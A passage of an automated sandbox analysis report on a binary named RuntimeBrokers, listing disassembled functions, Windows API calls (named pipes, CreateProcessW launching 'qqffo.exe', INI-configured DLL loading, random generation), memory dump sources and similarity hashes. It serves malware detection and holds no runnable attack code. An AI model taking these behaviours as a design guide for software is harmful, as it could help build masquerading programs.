                                        • memset.VCRUNTIME140(00000000,00000000,?,00000000,00000000,00000001,00000000,00000002,?,?,?,00000000,00000000,B33B76E5,?,?), ref: 6C0AF996
                                        • memmove.VCRUNTIME140(00000000,00000002,?,?,?,00000000,00000000,B33B76E5,?,?,00000000), ref: 6C0AF9A7
                                        • memmove.VCRUNTIME140(00000000,00000000,?,00000000,00000002,?,?,?,00000000,00000000,B33B76E5,?,?,00000000), ref: 6C0AF9BF
                                        • memset.VCRUNTIME140(00000000,00000000,?,00000000,00000000,?,00000000,00000002,?,?,?,00000000,00000000,B33B76E5,?,?), ref: 6C0AF9CD
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,B33B76E5,?,?), ref: 6C0AFA1B
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memmove$memset$_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 3802980928-0
                                        • Opcode ID: c6144304fca4d7f1142525508752c688bac0310c16712a09ceaaf94d0362776e
                                        • Instruction ID: cec59b9fc9ef2666cfdf2fe008214e55b4477bfa99912cc64b206561e277c950
                                        • Opcode Fuzzy Hash: c6144304fca4d7f1142525508752c688bac0310c16712a09ceaaf94d0362776e
                                        • Instruction Fuzzy Hash: 9141F6B2A00115BBDB14CBE8CC40B9EB7EDEF88358F158329E415A7A81D730ED06CB95
                                        Function 6C0DBD36 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0DBD3D
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000028), ref: 6C0DBD44
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DBD5A
                                        • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 6C0DBD66
                                        • ungetc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 6C0DBE84
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$Gninc@?$basic_streambuf@H_prolog3_ungetc
                                        • String ID:
                                        • API String ID: 4215999511-0
                                        • Opcode ID: 4ebdf828d5d6b0d3f275b08c051a71591ed9f9c024ea57981d21575ae9c1298f
                                        • Instruction ID: b4f32a9e92e701d6827a5bf93804be2381c687f262bc68025afd11c516b7bd5b
                                        • Opcode Fuzzy Hash: 4ebdf828d5d6b0d3f275b08c051a71591ed9f9c024ea57981d21575ae9c1298f
                                        • Instruction Fuzzy Hash: EF514C31A1461ADFCF14CFA9C490AEDBBF5AF09324B590219D512B3A90DB31F945CBA0
                                        Function 6C10BC41 Relevance: 12.1, APIs: 8, Instructions: 102COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C10BC4B
                                          • Part of subcall function 6C0C60AA: __EH_prolog3_GS.LIBCMT ref: 6C0C60B1
                                          • Part of subcall function 6C0C60AA: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,00000034,6C0C7475,0000001C,6C0C59BA,?,?,?,000000D4,6C0C4672,?,?), ref: 6C0C60C6
                                          • Part of subcall function 6C0C73AA: __EH_prolog3_GS.LIBCMT ref: 6C0C73B1
                                          • Part of subcall function 6C0C73AA: CryptGenRandom.ADVAPI32(?,?,?,00000034,6C0C748A,?,00000010,0000001C,6C0C59BA,?,?,?,000000D4,6C0C4672,?,?), ref: 6C0C73BF
                                          • Part of subcall function 6C0B30A0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(B33B76E5,?), ref: 6C0B30E3
                                          • Part of subcall function 6C0B30A0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,B33B76E5,?), ref: 6C0B3101
                                          • Part of subcall function 6C0B30A0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 6C0B312B
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?,00000002,00000001,?,00000010,000000E8,6C10BAD8,?,?,000000D8,6C10A41A,?,?,?,00000140), ref: 6C10BCCD
                                        • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(0000005F), ref: 6C10BCE8
                                          • Part of subcall function 6C0B3E10: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(B33B76E5,?,?,00000000), ref: 6C0B3E86
                                          • Part of subcall function 6C0B3E10: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,00000040,B33B76E5,?,?,00000000), ref: 6C0B3F18
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAVios_base@1@AAV21@@Z@Z.MSVCP140(6C0B0520), ref: 6C10BD02
                                        • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(00000030), ref: 6C10BD1B
                                        • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000002,00000000), ref: 6C10BD43
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP140(00000000), ref: 6C10BD53
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000002), ref: 6C10BD96
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@H_prolog3_$?widen@?$basic_ios@CryptV01@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@?flush@?$basic_ostream@?sputc@?$basic_streambuf@?width@ios_base@std@@AcquireContextD@std@@@1@_RandomV01@_V12@V21@@V?$basic_streambuf@Vios_base@1@
                                        • String ID:
                                        • API String ID: 1132785525-0
                                        • Opcode ID: 20c9b2c78ef4593661ac9b84e43afb51bab180c55c021c747bd38d54b4e23ad5
                                        • Instruction ID: 7dca2e04c085f506a78f39300b8dc8f479609a7409d965d005686ae79e1e1f9c
                                        • Opcode Fuzzy Hash: 20c9b2c78ef4593661ac9b84e43afb51bab180c55c021c747bd38d54b4e23ad5
                                        • Instruction Fuzzy Hash: 76419F31E00259DFCF24DFA4C955BEEBBB4AF04304F104098E609BB681EB756A49DF41
                                        Function 6C0EAD1A Relevance: 12.1, APIs: 8, Instructions: 80filepipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ConnectNamedPipe.KERNEL32(?,00000000), ref: 6C0EAD35
                                        • GetLastError.KERNEL32 ref: 6C0EAD3F
                                        • ReadFile.KERNEL32(?,?,000003FF,?,00000000), ref: 6C0EAD68
                                        • EnterCriticalSection.KERNEL32(?), ref: 6C0EAD80
                                        • LeaveCriticalSection.KERNEL32(?,00000000,?), ref: 6C0EADBE
                                        • SetEvent.KERNEL32(?), ref: 6C0EADC7
                                        • ReadFile.KERNEL32(?,?,000003FF,00000000,00000000), ref: 6C0EADE5
                                        • DisconnectNamedPipe.KERNEL32(?), ref: 6C0EADF3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CriticalFileNamedPipeReadSection$ConnectDisconnectEnterErrorEventLastLeave
                                        • String ID:
                                        • API String ID: 1260156429-0
                                        • Opcode ID: 387c5c152e07484dbb5a0d55969b2032a8cd1b370db1c2d2208746a84ea95c70
                                        • Instruction ID: fcb5b9092c81333205feb47b0cdb27f8a96427177b008596ec42256c78cf5f6a
                                        • Opcode Fuzzy Hash: 387c5c152e07484dbb5a0d55969b2032a8cd1b370db1c2d2208746a84ea95c70
                                        • Instruction Fuzzy Hash: E821A0B1654218AFDB10DF60CC48BEA7BFDEF09704F500468E746A7540DB71AA86CB64
                                        Function 6C172C86 Relevance: 12.1, APIs: 8, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C172C8D
                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,6C17265E,00000000,?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C172C98
                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C172CAF
                                        • std::locale::_Getfacet.LIBCPMT ref: 6C172CB9
                                          • Part of subcall function 6C0BD022: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000008,?,?,6C0B8242,00000000), ref: 6C0BD047
                                        • ?_Getcat@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000,?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C172CD2
                                        • std::_Facet_Register.LIBCPMT ref: 6C172CEA
                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C172D0D
                                        • _CxxThrowException.VCRUNTIME140(?,6C3DBC28,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C172D2C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@D@std@@@std@@@std@@ExceptionFacet_Getcat@?$time_get@GetfacetGetgloballocale@locale@std@@H_prolog3Locimp@12@RegisterThrowU?$char_traits@V42@@V?$istreambuf_iterator@Vfacet@locale@2@std::_std::locale::_
                                        • String ID:
                                        • API String ID: 1636399683-0
                                        • Opcode ID: 08eb5b8bb5fa371e017cdf5b0547a20b252a6e894e26f92eda9df463b3b63e29
                                        • Instruction ID: 4a7042969747ed9437b73ca260dcd6e7cfd380082fbb631ee33381b179f0f8ea
                                        • Opcode Fuzzy Hash: 08eb5b8bb5fa371e017cdf5b0547a20b252a6e894e26f92eda9df463b3b63e29
                                        • Instruction Fuzzy Hash: 3C117971E00229CBCF24DFE4C9889DDBBB8BF19314B200549E415B7790DB34AA058B91
                                        Function 6C0CE994 Relevance: 10.8, APIs: 7, Instructions: 272COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000025), ref: 6C0CE9B0
                                          • Part of subcall function 6C0CA55E: __EH_prolog3.LIBCMT ref: 6C0CA565
                                          • Part of subcall function 6C0CE5D8: __EH_prolog3_GS.LIBCMT ref: 6C0CE5E2
                                          • Part of subcall function 6C0CE5D8: ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000020,?,00000088), ref: 6C0CE605
                                        • ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000020), ref: 6C0CEC48
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?,?,00000000,?,00000000), ref: 6C0CECD3
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,?,00000000,?,00000000), ref: 6C0CECE5
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,00000000,?,00000000), ref: 6C0CED00
                                        • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(000000FF,?,?,00000000,?,00000000), ref: 6C0CED0F
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,00000000,?,00000000), ref: 6C0CED1C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?widen@?$ctype@D@std@@$?gbump@?$basic_streambuf@H_prolog3H_prolog3_
                                        • String ID:
                                        • API String ID: 2712489532-0
                                        • Opcode ID: 0bf30d069d67276998ea9567bd4015e3c5684bc528e247bb8aabffa856c7a762
                                        • Instruction ID: 2746e6ebafc6249dea70366c4b8af599cc1f543aa5829813d0d632a87ae39ef8
                                        • Opcode Fuzzy Hash: 0bf30d069d67276998ea9567bd4015e3c5684bc528e247bb8aabffa856c7a762
                                        • Instruction Fuzzy Hash: 0BB1B070B042648FDB248F28CC85BADBBF6AF46324F1442D9E16D97691DB309E85CF52
                                        Function 6C0B3E10 Relevance: 10.7, APIs: 7, Instructions: 169COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(B33B76E5,?,?,00000000), ref: 6C0B3E86
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,00000040,B33B76E5,?,?,00000000), ref: 6C0B3F18
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(00000000,00000040,B33B76E5,?,?,00000000), ref: 6C0B3F43
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 6C0B3F7B
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 2696997341-0
                                        • Opcode ID: 4c5be14b2f64dbc7e30a7ce9273dc9e99f973eb0328f0dd24a86f7ec81ec8ec4
                                        • Instruction ID: b30bc2eae4d8480ceb1106ce4e247c996b8f6884cba6394ca59c2fee5b133a76
                                        • Opcode Fuzzy Hash: 4c5be14b2f64dbc7e30a7ce9273dc9e99f973eb0328f0dd24a86f7ec81ec8ec4
                                        • Instruction Fuzzy Hash: 66617D75A016458FCB10CF68C584B59BBF1FF4D328F258259E929AB791CB32E945CB80
                                        Function 004120B6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 140processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetLastError.KERNEL32(00000000), ref: 0041224D
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,?,00000044,?), ref: 00412288
                                        • GetLastError.KERNEL32 ref: 004122A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateProcess
                                        • String ID: "%s" %s$D$qqffo.exe
                                        • API String ID: 1890760509-358432486
                                        • Opcode ID: 86cbd5ee971585e7e9bba371a2a80e76b6b23d4494de3b9cb3bbac9359109af3
                                        • Instruction ID: 27723f34361caef1dd751ddd9c3724af3f4664ee35cd7fd4542f6c9e68c048be
                                        • Opcode Fuzzy Hash: 86cbd5ee971585e7e9bba371a2a80e76b6b23d4494de3b9cb3bbac9359109af3
                                        • Instruction Fuzzy Hash: BE514C71904258EFDB21DB54DC49BDEBBB8AF05708F0044EAE509A72D1D7B45B88CF26
                                        Function 0040A233 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileStringW.KERNEL32(361,NotUseDefaultDllPath,0052EF28,?,00000400,?), ref: 0040A28B
                                        • GetPrivateProfileStringW.KERNEL32(DefaultValue,DllPath,00000000,?,00000104,?), ref: 0040A306
                                          • Part of subcall function 004092D4: _wcsrchr.LIBVCRUNTIME ref: 0040931B
                                          • Part of subcall function 004092D4: _wcsrchr.LIBVCRUNTIME ref: 00409330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString_wcsrchr
                                        • String ID: 361$DefaultValue$DllPath$NotUseDefaultDllPath
                                        • API String ID: 1113635261-1967476118
                                        • Opcode ID: 34e72e9f772437af39531fbee99d5b1976e2e22e22daed9e15ba42d46aabb20a
                                        • Instruction ID: 1bd216a5450a1ffd705053a3a4debfd751b2c3b35ec46cd04e094a394a1a06a2
                                        • Opcode Fuzzy Hash: 34e72e9f772437af39531fbee99d5b1976e2e22e22daed9e15ba42d46aabb20a
                                        • Instruction Fuzzy Hash: FE410B7291021CABEF14DF50EC86FEE7778AB18704F0045AAFA08A61D1DB74DA98CF55
                                        Function 6C13ADAC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Cnd_initX.LIBCPMT ref: 6C13ADED
                                          • Part of subcall function 6C0D17D4: _Mtx_lock.MSVCP140(?,?,?,6C0D1B80,?,00000014), ref: 6C0D17DB
                                          • Part of subcall function 6C0D17D4: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6C0D1B80,?,00000014), ref: 6C0D17E8
                                        • memmove.VCRUNTIME140(?,?,?,B33B76E5,?,?,?,00000000,6C32B78B,000000FF,?,6C1362F6,?,?,00000000,00000003), ref: 6C13AE05
                                        • std::_Cnd_initX.LIBCPMT ref: 6C13AE32
                                          • Part of subcall function 6C0D17F3: _Mtx_unlock.MSVCP140(?,?,?,6C0D1BC0,?,?,?), ref: 6C0D17FA
                                          • Part of subcall function 6C0D17F3: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6C0D1BC0,?,?,?), ref: 6C0D1807
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?), ref: 6C13AE38
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0CF613: __EH_prolog3_GS.LIBCMT ref: 6C0CF648
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6C13AE61
                                        • [Qos_http_handler]report qos id= %d, xrefs: 6C13AE80
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: C_error@std@@Cnd_initThrow_std::_$?get_log_instance@base@@H_prolog3H_prolog3_Logger@1@Mtx_lockMtx_unlockmemmove
                                        • String ID: [Qos_http_handler]report qos id= %d$d:\ci_dev\wegame_client\codes\common\src\qos_http_handler.cpp
                                        • API String ID: 1988896588-2901712207
                                        • Opcode ID: eba12813d48c9ef856aa429a6caab9f2b4b649929d36026799966ea65ed41b9a
                                        • Instruction ID: 63e793afbbcd7c5077d34f1bcdc27cba9b675d93774d8a4981d4adee7e068576
                                        • Opcode Fuzzy Hash: eba12813d48c9ef856aa429a6caab9f2b4b649929d36026799966ea65ed41b9a
                                        • Instruction Fuzzy Hash: 3841F671904258EFCB05DBA4C850BEDB7F8EF05318F104169E515A77C1DB79AB09CB62
                                        Function 6C13AF03 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Cnd_initX.LIBCPMT ref: 6C13AF44
                                          • Part of subcall function 6C0D17D4: _Mtx_lock.MSVCP140(?,?,?,6C0D1B80,?,00000014), ref: 6C0D17DB
                                          • Part of subcall function 6C0D17D4: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6C0D1B80,?,00000014), ref: 6C0D17E8
                                        • memmove.VCRUNTIME140(?,?,00000000,B33B76E5,?,?,00000000,00000000,6C32B78B,000000FF,?,6C133815,?,?), ref: 6C13AF5C
                                        • std::_Cnd_initX.LIBCPMT ref: 6C13AF89
                                          • Part of subcall function 6C0D17F3: _Mtx_unlock.MSVCP140(?,?,?,6C0D1BC0,?,?,?), ref: 6C0D17FA
                                          • Part of subcall function 6C0D17F3: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6C0D1BC0,?,?,?), ref: 6C0D1807
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?), ref: 6C13AF8F
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0CF613: __EH_prolog3_GS.LIBCMT ref: 6C0CF648
                                        Strings
